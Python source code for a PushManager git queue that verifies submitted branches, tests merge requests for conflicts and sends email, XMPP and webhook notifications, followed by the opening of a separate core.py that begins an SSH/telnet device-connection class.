old_shas_out = old_shas_out.strip()
old_sha_list = old_shas_out.split('\n')
GitCommand('submodule', '--quiet', 'sync', cwd=cwd).run()
# Only fetch changed submodules
for submodule in stale_submodules:
GitCommand('submodule', 'update', '--init', submodule, cwd=cwd).run()
GitCommand('--git-dir=%s/.git' % submodule, 'fetch', cwd=cwd).run()
_check_submodule(cwd, stale_submodules, old_sha_list)
def _check_submodule(cwd, submodule_names, old_shas):
"""
Checks that submodules
- Have a master branch
- Have been pushed to their master
- if the local and remote version differ, ensure that they can be
fast-forwarded.
If any of these fail, raise a GitException with some details.
:param cwd: On-disk path of the git repo to work with
:param submodule_names: List of names (relative paths) of submodules to check
:param old_shas: List of SHAs of the current versions of the submodules
"""
for name in submodule_names:
if _check_submodule_has_a_master(cwd, name):
if not _check_submodule_head_is_in_master(cwd, name):
exn_text = (
"Submodule error: %s has not been pushed to 'master'"
% name
)
raise GitException(
exn_text,
gitret=-1,
gitout=exn_text,
giterr=exn_text
)
# Find the sha that corresponds to the outdated submodule
old_sha = None
for sha in old_shas:
if sha.startswith(name):
old_sha = sha.split('\t')[1]
if not _check_submodule_is_fast_forward(cwd, name, old_sha):
exn_text = (
"Submodule Error: %s is not a fast forward of %s"
% (name, old_sha)
)
raise GitException(
exn_text,
gitret=-1,
gitout=exn_text,
giterr=exn_text
)
def _check_submodule_is_fast_forward(cwd, submodule_name, old_sha):
submodule_path = os.path.join(cwd, submodule_name)
_, new_sha, _ = GitCommand('rev-parse', 'HEAD', cwd=submodule_path).run()
_, submodule_out, _ = GitCommand(
'rev-list', '-n1', '%s..%s'
% (new_sha.strip(), old_sha), cwd=submodule_path
).run()
if len(submodule_out.strip()) > 0:
return False
return True
def _check_submodule_has_a_master(cwd, submodule_name):
submodule_path = os.path.join(cwd, submodule_name)
_, branch_output, _ = GitCommand('branch', '-r', cwd=submodule_path).run()
if "origin/master" in branch_output:
return True
else:
return False
def _check_submodule_head_is_in_master(cwd, submodule_name):
submodule_path = os.path.join(cwd, submodule_name)
_, head_sha, _ = GitCommand('rev-parse', 'HEAD', cwd=submodule_path).run()
_, branch_output, _ = GitCommand(
'branch', '-r', '--contains', head_sha.strip(),
cwd=submodule_path
).run()
return len(branch_output.strip()) > 0
@contextmanager
def git_merge_context_manager(test_branch, master_repo_path):
"""Context manager for merging that rolls back on __exit__
:param test_branch: The name of the branch to merge onto
:param master_repo_path: The on-disk path to the master repository
"""
# Store the starting ref so that we can hard reset if need be
get_starting_ref = GitCommand(
'rev-parse',
test_branch,
cwd=master_repo_path
)
_, stdout, _ = get_starting_ref.run()
starting_ref = stdout.strip()
try:
yield
except Exception, e:
raise e
finally:
git_reset_to_ref(
starting_ref,
master_repo_path
)
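# Hedged usage sketch of the two context managers together, mirroring how
# _test_pickme_conflict_master uses them (branch name and repo path are placeholders):
#
#   with git_branch_context_manager("pickme_test_1_2", repo_path):
#       with git_merge_context_manager("pickme_test_1_2", repo_path):
#           GitQueue.git_merge_pickme(worker_id, pickme_request, repo_path)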
class GitTaskAction(object):
VERIFY_BRANCH = 1
TEST_PICKME_CONFLICT = 2
TEST_ALL_PICKMES = 3
TEST_CONFLICTING_PICKMES = 4
class GitQueueTask(object):
"""
A task for the GitQueue to perform.
Task can be one of:
- VERIFY_BRANCH: check that a branch can be found and is not a duplicate
- TEST_PICKME_CONFLICT: check which (if any) branches also pickme'd for the
same push cause merge conflicts with this branch
- TEST_ALL_PICKMES: Takes a push id and queues every pickme with
TEST_PICKME_CONFLICT. Used when an item is de-pickmed to ensure that
anything it might have conflicted with is unmarked.
"""
def __init__(self, task_type, request_id, **kwargs):
self.task_type = task_type
self.request_id = request_id
self.kwargs = kwargs
class GitException(Exception):
"""
Exception class to be thrown in Git contexts
Has fields for git output on top of basic exception information.
:param gitret: Return code from the failing Git process
:param gitout: Stdout for the git process
:param giterr: Stderr for the git process
:param gitkwargs: Keyword arguments that were passed to the Git subprocess
"""
def __init__(self, details, gitret=None, gitout=None,
giterr=None, gitkwargs=None):
super(GitException, self).__init__(details, gitout, giterr, gitkwargs)
self.details = details
self.gitret = gitret
self.gitout = gitout
self.giterr = giterr
self.gitkwargs = gitkwargs
class GitCommand(subprocess.Popen):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
_args = ['git'] + list(args)
_kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
_kwargs.update(kwargs)
subprocess.Popen.__init__(self, _args, **_kwargs)
def run(self):
stdout, stderr = self.communicate()
if Settings['main_app']['debug']:
logging.error("%r, %r, %r", self.args, stdout, stderr)
if self.returncode:
raise GitException(
"GitException: git %s " % ' '.join(self.args),
gitret=self.returncode,
giterr=stderr,
gitout=stdout,
gitkwargs=self.kwargs
)
return self.returncode, stdout, stderr
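# Hedged usage sketch (the path is a placeholder): run() returns
# (returncode, stdout, stderr) and raises GitException on a non-zero exit code.
#
#   _, sha, _ = GitCommand('rev-parse', 'HEAD', cwd='/path/to/repo').run()
#   sha = sha.strip()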
class GitQueue(object):
conflict_queue = None
sha_queue = None
conflict_worker_process = None
sha_worker_process = None
shas_in_master = {}
EXCLUDE_FROM_GIT_VERIFICATION = Settings['git']['exclude_from_verification']
@classmethod
def request_is_excluded_from_git_verification(cls, request):
"""Some tags modify the workflow and are excluded from repository
verification.
"""
return tags_contain(request['tags'], cls.EXCLUDE_FROM_GIT_VERIFICATION)
@classmethod
def start_worker(cls):
worker_pids = []
if cls.conflict_worker_process is not None and cls.sha_worker_process is not None:
return worker_pids
cls.conflict_queue = JoinableQueue()
cls.sha_queue = JoinableQueue()
cls.conflict_workers = []
for worker_id in range(Settings['git']['conflict-threads']):
processing_func = functools.partial(
cls.process_conflict_queue,
worker_id
)
worker_thread = Process(target=processing_func, name='git-conflict-queue')
worker_thread.daemon = True
worker_thread.start()
cls.conflict_workers.append(worker_thread)
worker_pids.append(worker_thread.pid)
cls.sha_worker_process = Process(target=cls.process_sha_queue, name='git-sha-queue')
cls.sha_worker_process.daemon = True
cls.sha_worker_process.start()
worker_pids.append(cls.sha_worker_process.pid)
return worker_pids
@classmethod
def git_merge_pickme(cls, worker_id, pickme_request, master_repo_path):
"""Merges the branch specified by a pickme onto the current branch
:param pickme_request: Dictionary representing the pickme to merge
:param master_repo_path: On-disk path of the git repo to work in
"""
# Ensure that the branch we are merging is present
cls.create_or_update_local_repo(
worker_id,
pickme_request['repo'],
pickme_request['branch'],
checkout=False
)
# Locate and merge the branch we are testing
summary = "{branch_title}\n\n(Merged from {repo}/{branch})".format(
branch_title=pickme_request['title'],
repo=pickme_request['repo'],
branch=pickme_request['branch']
)
pull_command = GitCommand(
"pull",
"--no-ff",
"--no-commit",
pickme_request['repo'],
pickme_request['branch'],
cwd=master_repo_path)
pull_command.run()
commit_command = GitCommand(
"commit", "-m", summary,
"--no-verify", cwd=master_repo_path
)
commit_command.run()
# Verify that submodules are OK
_stale_submodule_check(master_repo_path)
@classmethod
def create_or_update_local_repo(cls, worker_id, repo_name, branch, checkout=True, fetch=False):
"""Clones the main repository if it does not exist.
If repo_name is not the main repo, add that repo as a remote and fetch
refs before checking out the specified branch.
"""
# Since we are keeping everything in the same repo, repo_path should
# always be the same
repo_path = cls._get_local_repository_uri(
Settings['git']['main_repository'],
worker_id
)
# repo_name is the remote to use. If we are dealing with the main
# repository, set the remote to origin.
if repo_name == Settings['git']['main_repository']:
repo_name = 'origin'
# Check if the main repo does not exist and needs to be created
if not os.path.isdir(repo_path):
# If we are using a reference mirror, add --reference [path] to
# the list of gitcommand args
clone_args = ['clone', cls._get_repository_uri(
Settings['git']['main_repository']
)]
if Settings['git']['use_local_mirror']:
if os.path.isdir(Settings['git']['local_mirror']):
clone_args.extend([
'--reference',
Settings['git']['local_mirror']
])
clone_args.append(repo_path)
# Clone the main repo into repo_path. Will take time!
clone_repo = GitCommand(*clone_args)
clone_repo.run()
if fetch:
# If we are dealing with a dev repo, make sure it is added as a remote
dev_repo_uri = cls._get_repository_uri(repo_name)
add_remote = GitCommand(
'remote', 'add', repo_name, dev_repo_uri,
cwd=repo_path
)
try:
add_remote.run()
except GitException, e:
# If the remote already exists, git will return err 128
if e.gitret == 128:
pass
else:
raise e
# Fetch the specified branch from the repo
remote_path = '+refs/heads/{branch}:refs/remotes/{repo}/{branch}'.format(
branch=branch,
repo=repo_name
)
fetch_updates = GitCommand(
'fetch',
'--prune',
repo_name,
remote_path,
cwd=repo_path
)
fetch_updates.run()
if checkout:
# Reset hard head, to ensure that we are able to checkout
GitCommand('reset', '--hard', 'HEAD', cwd=repo_path).run()
# Remove untracked files and directories
GitCommand('clean', '-fdfx', cwd=repo_path).run()
# Checkout the branch
full_branch = "%s/%s" % (repo_name, branch)
checkout_branch = GitCommand('checkout', full_branch, cwd=repo_path)
checkout_branch.run()
# Update submodules
sync_submodule = GitCommand(
"submodule", "--quiet", "sync",
cwd=repo_path
)
sync_submodule.run()
update_submodules = GitCommand(
"submodule", "--quiet", "update", "--init",
cwd=repo_path
)
update_submodules.run()
@classmethod
def _get_local_repository_uri(cls, repository, worker_id):
worker_repo = "{0}.{1}".format(repository, worker_id)
return os.path.join(Settings['git']['local_repo_path'], worker_repo)
@classmethod
def _get_repository_uri(cls, repository):
scheme = Settings['git']['scheme']
netloc = Settings['git']['servername']
if Settings['git']['auth']:
netloc = '%s@%s' % (Settings['git']['auth'], netloc)
if Settings['git']['port']:
netloc = '%s:%s' % (netloc, Settings['git']['port'])
if repository == Settings['git']['main_repository'] or repository == 'origin':
repository = (
'%s://%s/%s'
% (scheme, netloc, Settings['git']['main_repository'])
)
else:
repository = (
'%s://%s/%s/%s' % (
scheme, netloc,
Settings['git']['dev_repositories_dir'],
repository
)
)
return repository
@classmethod
def _get_branch_sha_from_repo(cls, req):
user_to_notify = req['user']
query_details = {
'user': req['user'],
'title': req['title'],
'repo': req['repo'],
'branch': req['branch'],
}
stdout = ""
try:
ls_remote = GitCommand(
'ls-remote', '-h',
cls._get_repository_uri(req['repo']), req['branch']
)
_, stdout, _ = ls_remote.run()
stdout = stdout.strip()
except GitException, e:
msg = """
<p>
There was an error verifying your push request in Git:
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em>
</p>
<p>
Attempting to query the specified repository failed with
the following error(s):
</p>
<pre>
%(stderr)s
</pre>
<p>
Regards,<br/>
PushManager
</p>
"""
query_details['stderr'] = e.giterr
msg %= EscapedDict(query_details)
subject = '[push error] %s - %s' % (req['user'], req['title'])
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
return None
# successful ls-remote, build up the refs list
tokens = (tok for tok in stdout.split())
refs = zip(tokens, tokens)
for sha, ref in refs:
if ref == ('refs/heads/%s' % req['branch']):
return sha
msg = (
"""
<p>
There was an error verifying your push request in Git:
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em>
</p>
<p>
The specified branch (%(branch)s) was not found in the
repository.
</p>
<p>
Regards,<br/>
PushManager
</p>
""")
msg %= EscapedDict(query_details)
subject = '[push error] %s - %s' % (req['user'], req['title'])
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
return None
@classmethod
def _get_request(cls, request_id):
result = [None]
def on_db_return(success, db_results):
assert success, "Database error."
result[0] = db_results.first()
request_info_query = db.push_requests.select().where(
db.push_requests.c.id == request_id
)
db.execute_cb(request_info_query, on_db_return)
req = result[0]
if req:
req = dict(req.items())
return req
@classmethod
def _get_request_ids_in_push(cls, push_id):
"""Return a list of IDs corresponding with the push requests
that have been pickmed for the push specified by push_id
:param push_id: Integer id of the push to get pickmes for
:return pickme_ids: List of pickme IDs from the database
"""
pickme_list = []
def on_db_return(success, db_results):
assert success, "Database error."
for (request, _) in db_results:
pickme_list.append(str(request))
request_info_query = db.push_pushcontents.select().where(
db.push_pushcontents.c.push == int(push_id)
)
db.execute_cb(request_info_query, on_db_return)
return pickme_list
@classmethod
def _get_push_for_request(cls, request_id):
"""Given the ID of a push request, find the push for which this
request has been pickmed.
"""
result = [None]
def on_db_return(success, db_results):
assert success, "Database error."
result[0] = db_results.first()
request_info_query = db.push_pushcontents.select().where(
db.push_pushcontents.c.request == request_id
)
db.execute_cb(request_info_query, on_db_return)
req = result[0]
if req:
req = dict(req.items())
return req
@classmethod
def _get_request_with_sha(cls, sha):
result = [None]
def on_db_return(success, db_results):
assert success, "Database error."
result[0] = db_results.first()
request_info_query = db.push_requests.select().where(
db.push_requests.c.revision == sha
)
db.execute_cb(request_info_query, on_db_return)
req = result[0]
if req:
req = dict(req.items())
return req
@classmethod
def _update_request(cls, req, updated_values):
result = [None]
def on_db_return(success, db_results):
result[0] = db_results[1].first()
assert success, "Database error."
update_query = db.push_requests.update().where(
db.push_requests.c.id == req['id']
).values(updated_values)
select_query = db.push_requests.select().where(
db.push_requests.c.id == req['id']
)
db.execute_transaction_cb([update_query, select_query], on_db_return)
updated_request = result[0]
if updated_request:
updated_request = dict(updated_request.items())
if not updated_request:
logging.error(
"Git-queue worker failed to update the request (id %s).",
req['id']
)
logging.error(
"Updated Request values were: %s",
repr(updated_values)
)
return updated_request
@classmethod
def _sha_exists_in_master(cls, worker_id, sha):
"""Check if a given SHA is included in master
Memoize shas that are, so that we can avoid expensive rev-lists later.
We can't cache shas that are not in master, since we won't know when they get merged.
"""
# Dirty cache expiry mechanism, but better than constantly
# accumulating SHAs in memory
if len(cls.shas_in_master) > 1000:
cls.shas_in_master = {}
if sha in cls.shas_in_master:
return True
repo_path = cls._get_local_repository_uri(
Settings['git']['main_repository'],
worker_id
)
try:
_, merge_base, _ = GitCommand('merge-base', 'origin/master', sha, cwd=repo_path).run()
except GitException:
# If the hash is entirely unknown, Git will throw an error
# fatal: Not a valid commit name <sha>.
return False
merge_base = merge_base.strip()
if sha == merge_base:
cls.shas_in_master[sha] = True
return True
else:
return False
@classmethod
def _test_pickme_conflict_pickme(cls, worker_id, req, target_branch,
repo_path, pushmanager_url, requeue):
"""Test for any pickmes that are broken by pickme'd request req
Precondition: We should already be on a test branch, and the pickme to
be tested against should already be successfully merged.
:param req: Details for pickme to test against
:param target_branch: Name of branch onto which to attempt merge
:param repo_path: On-disk path to local repository
:param requeue: Boolean whether or not to requeue pickmes that are conflicted with
"""
push = cls._get_push_for_request(req['id'])
if push is None:
logging.warn(
"Couldn't test pickme %d - couldn't find corresponding push",
req['id']
)
return False, None
pickme_ids = cls._get_request_ids_in_push(push['push'])
pickme_ids = [p for p in pickme_ids if int(p) != int(req['id'])]
conflict_pickmes = []
# For each pickme, check if merging it on top throws an exception.
# If it does, keep track of the pickme in conflict_pickmes
for pickme in pickme_ids:
pickme_details = cls._get_request(pickme)
if not pickme_details:
logging.error(
"Tried to test for conflicts against invalid request id %s",
pickme
)
continue
if 'state' not in pickme_details or pickme_details['state'] not in ('pickme', 'added'):
continue
# Ensure we have a copy of the pickme we are comparing against
cls.create_or_update_local_repo(
worker_id,
pickme_details['repo'],
branch=pickme_details['branch'],
fetch=True,
checkout=False
)
# Don't check against pickmes that are already in master, as
# it would throw 'nothing to commit' errors
sha = cls._get_branch_sha_from_repo(pickme_details)
if sha is None or cls._sha_exists_in_master(worker_id, sha):
continue
# If the pickme has no '*conflict*' tags, it has not been checked and
# it may conflict with master, which here would cause a pickme
# conflict. Skip it, as it should be queued to be checked, and will
# get tested against us later.
if "conflict" not in pickme_details['tags']:
continue
# Don't bother trying to compare against pickmes that
# break master, as they will conflict by default
if "conflict-master" in pickme_details['tags']:
continue
try:
with git_merge_context_manager(target_branch,
repo_path):
cls.git_merge_pickme(worker_id, pickme_details, repo_path)
except GitException, e:
if req['state'] == 'added' and pickme_details['state'] == 'pickme':
pass
else:
conflict_pickmes.append((pickme, e.gitout, e.giterr))
# Requeue the conflicting pickme so that it also picks up the
# conflict. Pass on that it was requeued automatically and to
# NOT requeue things in that run, otherwise two tickets will
# requeue each other forever.
if requeue and pickme_details['state'] != 'added':
GitQueue.enqueue_request(
GitTaskAction.TEST_PICKME_CONFLICT,
pickme,
pushmanager_url=pushmanager_url,
requeue=False
)
# If there were no conflicts, don't update the request
if not conflict_pickmes:
return False, None
updated_tags = add_to_tags_str(req['tags'], 'conflict-pickme')
updated_tags = del_from_tags_str(updated_tags, 'no-conflicts')
formatted_conflicts = ""
for broken_pickme, git_out, git_err in conflict_pickmes:
pickme_details = cls._get_request(broken_pickme)
formatted_pickme_err = (
"""<strong>Conflict with <a href=\"/request?id={pickme_id}\">
{pickme_name}</a>: </strong><br/>{pickme_out}<br/>{pickme_err}
<br/><br/>"""
).format(
pickme_id=broken_pickme,
pickme_err=xhtml_escape(git_err),
pickme_out=xhtml_escape(git_out),
pickme_name=xhtml_escape(pickme_details['title'])
)
formatted_conflicts += formatted_pickme_err
updated_values = {
'tags': updated_tags,
'conflicts': formatted_conflicts
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme details")
else:
return True, updated_request
@classmethod
def _clear_pickme_conflict_details(cls, req):
"""Strips the conflict-pickme, conflict-master and no-conflicts tags from a
pickme, and clears the detailed conflict field.
:param req: Details of pickme request to clear conflict details of
"""
updated_tags = del_from_tags_str(req['tags'], 'conflict-master')
updated_tags = del_from_tags_str(updated_tags, 'conflict-pickme')
updated_tags = del_from_tags_str(updated_tags, 'no-conflicts')
updated_values = {
'tags': updated_tags,
'conflicts': ''
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme")
@classmethod
def _test_pickme_conflict_master(
cls, worker_id, req, target_branch,
repo_path, pushmanager_url, requeue):
"""Test whether the pickme given by req can be successfully merged onto
master.
If the pickme was merged successfully, it calls
_test_pickme_conflict_pickme to check the pickme against others in the
same push.
:param req: Details of pickme request to test
:param target_branch: The name of the test branch to use for testing
:param repo_path: The location of the repository we are working in
"""
# Ensure we have a copy of the pickme branch
cls.create_or_update_local_repo(
worker_id,
req['repo'],
branch=req['branch'],
fetch=True,
checkout=False
)
# Create a test branch following master
with git_branch_context_manager(target_branch, repo_path):
# Merge the pickme we are testing onto the test branch
# If this fails, that means pickme conflicts with master
try:
with git_merge_context_manager(target_branch, repo_path):
# Try to merge the pickme onto master
cls.git_merge_pickme(worker_id, req, repo_path)
# Check for conflicts with other pickmes
return cls._test_pickme_conflict_pickme(
worker_id,
req,
target_branch,
repo_path,
pushmanager_url,
requeue
)
except GitException, e:
updated_tags = add_to_tags_str(req['tags'], 'conflict-master')
updated_tags = del_from_tags_str(updated_tags, 'no-conflicts')
conflict_details = "<strong>Conflict with master:</strong><br/> %s <br/> %s" % (e.gitout, e.giterr)
updated_values = {
'tags': updated_tags,
'conflicts': conflict_details
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme")
else:
return True, updated_request
@classmethod
def test_pickme_conflicts(
cls,
worker_id,
request_id,
pushmanager_url,
requeue=True):
"""
Tests for conflicts between a pickme and both master and other pickmes
in the same push.
:param request_id: ID number of the pickme to be tested
:param requeue: Whether or not pickmes that this pickme conflicts with
should be added back into the GitQueue as a test conflict task.
"""
req = cls._get_request(request_id)
if not req:
logging.error(
"Tried to test conflicts for invalid request id %s",
request_id
)
return
if 'state' not in req or req['state'] not in ('pickme', 'added'):
return
push = cls._get_push_for_request(request_id)
if not push:
logging.error(
"Request %s (%s) doesn't seem to be part of a push",
request_id,
req['title']
)
return
push_id = push['push']
#### Set up the environment as though we are preparing a deploy push
## Create a branch pickme_test_PUSHID_PICKMEID
# Ensure that the local copy of master is up-to-date
cls.create_or_update_local_repo(
worker_id,
Settings['git']['main_repository'],
branch="master",
fetch=True
)
# Get base paths and names for the relevant repos
repo_path = cls._get_local_repository_uri(
Settings['git']['main_repository'],
worker_id
)
target_branch = "pickme_test_{push_id}_{pickme_id}".format(
push_id=push_id,
pickme_id=request_id
)
# Check that the branch is still reachable
sha = cls._get_branch_sha_from_repo(req)
if sha is None:
return
# Check if the pickme has already been merged into master
if cls._sha_exists_in_master(worker_id, sha):
return
# Clear the pickme's conflict info
cls._clear_pickme_conflict_details(req)
# Check for conflicts with master
conflict, updated_pickme = cls._test_pickme_conflict_master(
worker_id,
req,
target_branch,
repo_path,
pushmanager_url,
requeue
)
if conflict:
if updated_pickme is None:
raise Exception(
"Encountered merge conflict but was not passed details"
)
cls.pickme_conflict_detected(updated_pickme, requeue, pushmanager_url)
else:
# If the request does not conflict here or anywhere else, mark it as
# no-conflicts
req = cls._get_request(request_id)
if 'conflict' in req['tags']:
return
updated_tags = add_to_tags_str(req['tags'], 'no-conflicts')
updated_values = {
'tags': updated_tags,
}
updated_request = cls._update_request(req, updated_values)
if not updated_request:
raise Exception("Failed to update pickme")
@classmethod
def pickme_conflict_detected(cls, updated_request, send_notifications, pushmanager_url):
msg = (
"""
<p>
PushManager has detected that your pickme contains conflicts with %(conflicts_with)s.
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em><br />
<a href="%(pushmanager_url)s/request?id=%(id)s">%(pushmanager_url)s/request?id=%(id)s</a>
</p>
<p>
Review # (if specified): <a href="https://%(reviewboard_servername)s/r/%(reviewid)s">%(reviewid)s</a>
</p>
<p>
<code>%(revision)s</code><br/>
<em>(If this is <strong>not</strong> the revision you expected,
make sure you've pushed your latest version to the correct repo!)</em>
</p>
<p>
%(conflicts)s
</p>
<p>
Regards,<br/>
PushManager
</p>
"""
)
updated_request.update(
{
'conflicts_with': (
"master"
if 'conflict-master' in updated_request['tags']
else "another pickme"
),
'conflicts': updated_request['conflicts'].replace('\n', '<br/>'),
'reviewboard_servername': Settings['reviewboard']['servername'],
'pushmanager_url' : pushmanager_url
}
)
escaped_request = EscapedDict(updated_request)
escaped_request.unescape_key('conflicts')
msg %= escaped_request
subject = (
'[push conflict] %s - %s'
% (updated_request['user'], updated_request['title'])
)
user_to_notify = updated_request['user']
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
msg = """PushManager has detected that your pickme for %(pickme_name)s contains conflicts with %(conflicts_with)s
%(pushmanager_url)s/request?id=%(pickme_id)s""" % {
'conflicts_with': (
"master"
if 'conflict-master' in updated_request['tags']
else "another pickme"
),
'pickme_name': updated_request['branch'],
'pickme_id': updated_request['id'],
'pushmanager_url' : pushmanager_url
}
XMPPQueue.enqueue_user_xmpp([user_to_notify], msg)
@classmethod
def verify_branch(cls, request_id, pushmanager_url):
req = cls._get_request(request_id)
if not req:
# Just log this and return. We won't be able to get more
# data out of the request.
error_msg = "Git queue worker received a job for non-existent request id %s" % request_id
logging.error(error_msg)
return
if cls.request_is_excluded_from_git_verification(req):
return
if not req['branch']:
error_msg = "Git queue worker received a job for request with no branch (id %s)" % request_id
return cls.verify_branch_failure(req, error_msg, pushmanager_url)
sha = cls._get_branch_sha_from_repo(req)
if sha is None:
error_msg = "Git queue worker could not get the revision from request branch (id %s)" % request_id
return cls.verify_branch_failure(req, error_msg, pushmanager_url)
duplicate_req = cls._get_request_with_sha(sha)
if (
duplicate_req and 'state' in duplicate_req
and not duplicate_req['state'] == "discarded"
and duplicate_req['id'] != request_id
):
error_msg = "Git queue worker found another request with the same revision sha (ids %s and %s)" % (
duplicate_req['id'],
request_id
)
return cls.verify_branch_failure(req, error_msg, pushmanager_url)
updated_tags = add_to_tags_str(req['tags'], 'git-ok')
updated_tags = del_from_tags_str(updated_tags, 'git-error')
updated_values = {'revision': sha, 'tags': updated_tags}
updated_request = cls._update_request(req, updated_values)
if updated_request:
cls.verify_branch_successful(updated_request, pushmanager_url)
@classmethod
def verify_branch_successful(cls, updated_request, pushmanager_url):
msg = (
"""
<p>
PushManager has verified the branch for your request.
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em><br />
<a href="%(pushmanager_url)s/request?id=%(id)s">%(pushmanager_url)s/request?id=%(id)s</a>
</p>
<p>
Review # (if specified): <a href="https://%(reviewboard_servername)s/r/%(reviewid)s">%(reviewid)s</a>
</p>
<p>
Verified revision: <code>%(revision)s</code><br/>
<em>(If this is <strong>not</strong> the revision you expected,
make sure you've pushed your latest version to the correct repo!)</em>
</p>
<p>
Regards,<br/>
PushManager
</p>
"""
)
updated_request.update({
'pushmanager_url' : pushmanager_url,
'reviewboard_servername': Settings['reviewboard']['servername']
})
msg %= EscapedDict(updated_request)
subject = '[push] %s - %s' % (
updated_request['user'],
updated_request['title']
)
user_to_notify = updated_request['user']
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
webhook_req(
'pushrequest',
updated_request['id'],
'ref',
updated_request['branch'],
)
webhook_req(
'pushrequest',
updated_request['id'],
'commit',
updated_request['revision'],
)
if updated_request['reviewid']:
webhook_req(
'pushrequest',
updated_request['id'],
'review',
updated_request['reviewid'],
)
@classmethod
def verify_branch_failure(cls, request, failure_msg, pushmanager_url):
logging.error(failure_msg)
updated_tags = add_to_tags_str(request['tags'], 'git-error')
updated_tags = del_from_tags_str(updated_tags, 'git-ok')
updated_values = {'tags': updated_tags}
cls._update_request(request, updated_values)
msg = (
"""
<p>
<em>PushManager could <strong>not</strong> verify the branch for your request.</em>
</p>
<p>
<strong>%(user)s - %(title)s</strong><br />
<em>%(repo)s/%(branch)s</em><br />
<a href="%(pushmanager_url)s/request?id=%(id)s">%(pushmanager_url)s/request?id=%(id)s</a>
</p>
<p>
<strong>Error message</strong>:<br />
%(failure_msg)s
</p>
<p>
Review # (if specified): <a href="https://%(reviewboard_servername)s/r/%(reviewid)s">%(reviewid)s</a>
</p>
<p>
Verified revision: <code>%(revision)s</code><br/>
<em>(If this is <strong>not</strong> the revision you expected,
make sure you've pushed your latest version to the correct repo!)</em>
</p>
<p>
Regards,<br/>
PushManager
</p>
"""
)
request.update({
'failure_msg': failure_msg,
'pushmanager_url' : pushmanager_url,
'reviewboard_servername': Settings['reviewboard']['servername']
})
msg %= EscapedDict(request)
subject = '[push] %s - %s' % (request['user'], request['title'])
user_to_notify = request['user']
MailQueue.enqueue_user_email([user_to_notify], msg, subject)
@classmethod
def requeue_pickmes_for_push(cls, push_id, pushmanager_url, conflicting_only=False):
request_details = []
for pickme_id in cls._get_request_ids_in_push(push_id):
request_details.append(cls._get_request(pickme_id))
if conflicting_only:
request_details = [
req for req in request_details
if req and req['tags']
and 'conflict-pickme' in req['tags']
]
for req in request_details:
GitQueue.enqueue_request(
GitTaskAction.TEST_PICKME_CONFLICT,
req['id'],
pushmanager_url=pushmanager_url,
requeue=False
)
@classmethod
def process_sha_queue(cls):
logging.info("Starting GitConflictQueue")
while True:
# Throttle
time.sleep(1)
task = cls.sha_queue.get()
if not isinstance(task, GitQueueTask):
logging.error("Non-task object in GitSHAQueue: %s", task)
continue
try:
if task.task_type is GitTaskAction.VERIFY_BRANCH:
cls.verify_branch(task.request_id, task.kwargs['pushmanager_url'])
else:
logging.error(
"GitSHAQueue encountered unknown task type %d",
task.task_type
)
except Exception:
logging.error('THREAD ERROR:', exc_info=True)
finally:
cls.sha_queue.task_done()
@classmethod
def process_conflict_queue(cls, worker_id):
logging.error("Starting GitConflictQueue %d", worker_id)
while True:
# Throttle
time.sleep(1)
task = cls.conflict_queue.get()
if not isinstance(task, GitQueueTask):
logging.error("Non-task object in GitConflictQueue: %s", task)
continue
try:
if task.task_type is GitTaskAction.TEST_PICKME_CONFLICT:
cls.test_pickme_conflicts(worker_id, task.request_id, **task.kwargs)
elif task.task_type is GitTaskAction.TEST_CONFLICTING_PICKMES:
cls.requeue_pickmes_for_push(task.request_id, task.kwargs['pushmanager_url'], conflicting_only=True)
elif task.task_type is GitTaskAction.TEST_ALL_PICKMES:
cls.requeue_pickmes_for_push(task.request_id, task.kwargs['pushmanager_url'])
else:
logging.error(
"GitConflictQueue encountered unknown task type %d",
task.task_type
)
except Exception:
logging.error('THREAD ERROR:', exc_info=True)
finally:
cls.conflict_queue.task_done()
@classmethod
def enqueue_request(cls, task_type, request_id, **kwargs):
if task_type is GitTaskAction.VERIFY_BRANCH:
if not cls.sha_queue:
logging.error("Attempted to put to nonexistent GitSHAQueue!")
return
cls.sha_queue.put(GitQueueTask(task_type, request_id, **kwargs))
else:
if not cls.conflict_queue:
logging.error("Attempted to put to nonexistent GitConflictQueue!")
return
cls.conflict_queue.put(GitQueueTask(task_type, request_id, **kwargs))
def webhook_req(left_type, left_token, right_type, right_token):
webhook_url = Settings['web_hooks']['post_url']
body = urlencode({
'reason': 'pushmanager',
'left_type': left_type,
'left_token': left_token,
'right_type': right_type,
'right_token': right_token,
})
try:
f = urllib2.urlopen(webhook_url, body, timeout=3)
f.close()
except urllib2.URLError:
logging.error("Web hook POST failed:", exc_info=True)
__all__ = ['GitQueue']
|
core.py
|
#!/usr/bin/env python3
#Imports
import os
import re
import pexpect
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import ast
from time import sleep
import datetime
import sys
import threading
from pathlib import Path
from copy import deepcopy
#functions and classes
class node:
''' This class generates a node object. Contains all the information and methods to connect and interact with a device using ssh or telnet.
### Attributes:
- output (str): Output of the commands you ran with the run or test
method.
- result (bool): True if the expected value is found after running
the commands using the test method.
- status (int): 0 if the run or test method finished successfully.
1 if the connection failed.
2 if expect timed out without a prompt or EOF.
'''
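# Hedged usage sketch (host, credentials and log folder are placeholders):
#
#   router = node("router1", "192.168.1.1", user="admin", password="secret")
#   router.run(["show version"], folder="/tmp/logs")
#   print(router.status, router.output)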
def __init__(self, unique, host, options='', logs='', password='', port='', protocol='', user='', config=''):
'''
### Parameters:
- unique (str): Unique name to assign to the node.
- host (str): IP address or hostname of the node.
### Optional Parameters:
- options (str): Additional options to pass to ssh/telnet for the
connection.
- logs (str): Path/file for storing the logs. You can use
${unique}, ${host}, ${port}, ${user}, ${protocol}
as variables.
- password (str): Encrypted or plaintext password.
